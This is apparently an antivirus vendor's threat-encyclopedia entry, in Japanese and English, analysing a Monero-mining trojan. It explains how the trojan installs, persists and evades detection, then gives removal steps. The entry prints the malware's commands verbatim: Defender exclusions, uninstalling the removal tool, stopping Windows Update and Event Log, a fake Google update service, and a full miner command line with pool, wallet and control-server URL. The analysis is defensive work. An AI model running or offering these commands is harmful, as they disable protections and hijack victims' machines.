解析者: Neljorn Nathaniel Aguas   
 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:

  • マルウェアタイプ:
    トロイの木馬型

  • 破壊活動の有無:
    なし

  • 暗号化:
     

  • 感染報告の有無 :
    はい

  概要

感染経路 インターネットからのダウンロード, 他のマルウェアからの作成

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、正規のアプリケーションとよく似たサービスを追加することで、正規サービスとして装います。

マルウェアは、特定のWebサイトにアクセスし、情報を送受信します。 概要:プログラムは、コンピュータのCPUおよびGPUのリソースを利用して仮想通貨を発掘します。

  詳細

ファイルサイズ 817833480 bytes
タイプ EXE
メモリ常駐 はい
発見日 2024年10月28日
ペイロード URLまたはIPアドレスに接続, ファイルの作成, システムのレジストリの変更

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、異なるファイル名を用いて以下のフォルダ内に自身のコピーを作成します。

  • %ProgramData%\Google\Chrome\updater.exe

(註:%ProgramData%フォルダは、マルチユーザーシステムにおいて任意のユーザがプログラムに変更を加えることができるプログラムファイルフォルダのバージョンです。これには、すべてのユーザのアプリケーションデータが含まれます。Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\ProgramData" です。Windows Server 2003(32-bit)、2000(32-bit)、XPの場合、通常 "C:\Documents and Settings\All Users" です。 )

マルウェアは、以下のプロセスを追加します。

  • powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force → adds the user profile and program data directories to the exclusion list for Windows Defender to bypass scanning specific folders and .exe files.
  • cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart → quietly uninstalls the Microsoft Malicious Software Removal Tool (KB890830) without restarting the computer.
  • c.exe stop UsoSvc → stops the Update Orchestrator Service, which manages Windows Updates
  • sc.exe stop WaaSMedicSvc → stops the Windows Update Medic Service, which ensures the proper functioning of Windows Update components
  • sc.exe stop wuauserv → stops the Windows Update service to halt automatic updates
  • sc.exe stop bits → stops the Background Intelligent Transfer Service, used by Windows Update for downloading updates
  • sc.exe stop dosvc → stops the Delivery Optimization service, which handles peer-to-peer update sharing
  • powercfg.exe /x -hibernate-timeout-ac 0 → disables the hibernate timeout for computers on AC power
  • powercfg.exe /x -hibernate-timeout-dc 0 → disables the hibernate timeout for computers on battery power
  • powercfg.exe /x -standby-timeout-ac 0 → disables the standby timeout for computers on AC power
  • powercfg.exe /x -standby-timeout-dc 0 → disables the standby timeout for computers on battery power
  • sc.exe delete "GoogleUpdateTaskMachineQC" → deletes existing service named "GoogleUpdateTaskMachineQC"
  • sc.exe create "GoogleUpdateTaskMachineQC" binpath= "%ProgramData%\Google\Chrome\updater.exe" start= "auto" → creates a new service that points to the dropped copy of itself
  • sc.exe stop eventlog → stops the Windows Event Log service
  • sc.exe start "GoogleUpdateTaskMachineQC" → starts the newly created service.
  • explorer.exe --algo=rx/0 --url=xmr.2miners.com:12222 --user=86EBNigoaCXSio7ySVmzWpQKwD6L2LAsFFhfZEFbqiivD4n2BdrXF4XKcXAFHLS7hsRcYW3WXpQZqgkWuFR66QeqMx3AV4S --pass=x --cpu-max-threads-hint=20 --cinit-winring=mhhvoejiojwd.sys --cinit-stealth-targets=Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,PLlhDBWxRt.exe,GPU-Z.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe --cinit-api=http://cdnupdateservice.com/api/endpoint.php --cinit-version=3.4.0 --tls --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-id=tjnooobwkhcgvgyn → runs a hidden Monero mining process disguised as a legitimate process and using stealth parameters to avoid detection by various applications

マルウェアは、正規のアプリケーションとよく似た以下のサービスを追加することで、正規サービスとして装います。

  • Service Name: GoogleUpdateTaskMachineQC
    Type: Own process
    Binary Path: %ProgramData%\Google\Chrome\updater.exe
    Start type: Auto start

(註:%ProgramData%フォルダは、マルチユーザーシステムにおいて任意のユーザがプログラムに変更を加えることができるプログラムファイルフォルダのバージョンです。これには、すべてのユーザのアプリケーションデータが含まれます。Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\ProgramData" です。Windows Server 2003(32-bit)、2000(32-bit)、XPの場合、通常 "C:\Documents and Settings\All Users" です。 )

他のシステム変更

マルウェアは、以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\MRT
DontOfferThroughWUAU = 1 → disables offering Microsoft Removal Tool updates through Windows Update

マルウェアは、以下のレジストリキーを変更します。

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
services\wuauserv
Renamed to wuauserv_bkp → results in Windows Update service to stop working

HKEY_LOCAL_MACHINE\System\CurrentControlSet\
services\BITS
Renamed to BITS_bkp → results in Background Intelligent Transfer Service to stop working

その他

マルウェアは、以下のレジストリキーを追加します。

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\MRT

マルウェアは、以下のWebサイトにアクセスし、情報を送受信します。

  • http://{BLOCKED}.{BLOCKED}.{BLOCKED}.251
    which redirects to:
    • http://{BLOCKED}ateservice.com/api/endpoint.php
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.184:1222
    which redirects to:
    • {BLOCKED}ners.com:12222
      which redirects again to:
      • {BLOCKED}ners.com:12222 mining pool

マルウェアは、以下を実行します。

  • It utilizes binary padding to increase its own file size and evade detection.
  • It uses up to 20 CPU threads for mining, potentially slowing down the system.
  • It injects its mining process to explorer.exe and hides itself from detection from the following applications:
    • GPU-Z.exe
    • perfmon.exe
    • ProcessHacker.exe
    • procexp.exe
    • procexp64.exe
    • Taskmgr.exe
    • arma3_x64.exe
    • arma3.exe
    • bf4.exe
    • BlackOpsColdWar.exe
    • Borderlands2.exe
    • Borderlands3.exe
    • CK2game.exe
    • ck3.exe
    • csgo.exe
    • Cyberpunk2077.exe
    • DeadByDaylight-Win64-Shipping.exe
    • EliteDangerous64.exe
    • enlisted.exe
    • EscapeFromTarkov.exe
    • FactoryGame.exe
    • Falluot4.exe
    • FarCry5.exe
    • ffxiv_dx11.exe
    • ffxiv.exe
    • FIFA21.exe
    • FiveM_b2189_GTAProcess.exe
    • FiveM_GTAProcess.exe
    • FiveM.exe
    • FortniteClient-Win64-Shipping.exe
    • ForzaHorizon4.exe
    • GenshinImpact.exe
    • GTA5.exe
    • iw6sp64_ship.exe
    • League of Legends.exe
    • LeagueClientUx.exe
    • left4dead2.exe
    • Little_Nightmares_II_Enhanced-Win64-Shipping.exe
    • ModernWarfare.exe
    • NarakaBladepoint.exe
    • NarakaBladepoint.exe
    • NBA2K21.exe
    • NBA2K22.exe
    • NMS.exe
    • Phasmophobia.exe
    • PlanetCoaster.exe
    • PointBlank.exe
    • PortalWars-Win64-Shipping.exe
    • r5apex.exe
    • RainbowSix_BE.exe
    • RainbowSix.exe
    • RDR2.exe
    • re8.exe
    • RocketLeague.exe
    • RogueCompany.exe
    • RustClient.exe
    • ShooterGame_BE.exe
    • ShooterGame.exe
    • ShooterGameServer.exe
    • SoTGame.exe
    • SRTTR.exe
    • stellaris.exe
    • TEKKEN7.exe
    • Tiger-Win64-Shipping.exe
    • TslGame.exe
    • VALORANT.exe
    • VRChat.exe
    • Warframe.x64.exe
    • WatchDogsLegion.exe
    • WorldOfTanks.exe
    • zula.exe
    • acad.exe
    • Adobe Premiere Pro.exe
    • AfterFX.exe
    • Photoshop.exe
    • VideoEditorPlus.exe
    • AndroidEmulatorEn.exe
    • PLlhDBWxRt.exe
  • It throttles down CPU usage to 90% if the system is idle.
  • It uses the following version of XMR mining application:
    • 3.4.0
  • It mines the following cryptocurrency coin:
    • Monero (XMR)

詳細:プログラムは、コンピュータのCPUおよびGPUのリソースを利用して仮想通貨を発掘します。その結果、感染コンピュータの動作が非常に遅くなります。

  対応方法

対応検索エンジン: 9.800
初回 VSAPI パターンバージョン 19.674.08
初回 VSAPI パターンリリース日 2024年10月25日
VSAPI OPR パターンバージョン 19.675.00
VSAPI OPR パターンリリース日 2024年10月26日

手順 1

Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 3

セーフモードでの再起動後、以下のレジストリキーを削除してください。

[ 詳細 ]

警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\
    • GoogleUpdateTaskMachineQC

手順 4

このレジストリ値を削除します。

[ 詳細 ]

警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

  • In HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
    • DontOfferThroughWUAU = 1

手順 5

このレジストリキーを削除します。

[ 詳細 ]

警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

  • In HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\
    • MRT

手順 6

以下のファイルを検索し削除します。

[ 詳細 ]
コンポーネントファイルが隠しファイル属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
  • %ProgramData%\Google\Chrome\updater.exe

手順 7

コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「Trojan.Win64.MALXMR.CJDR」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください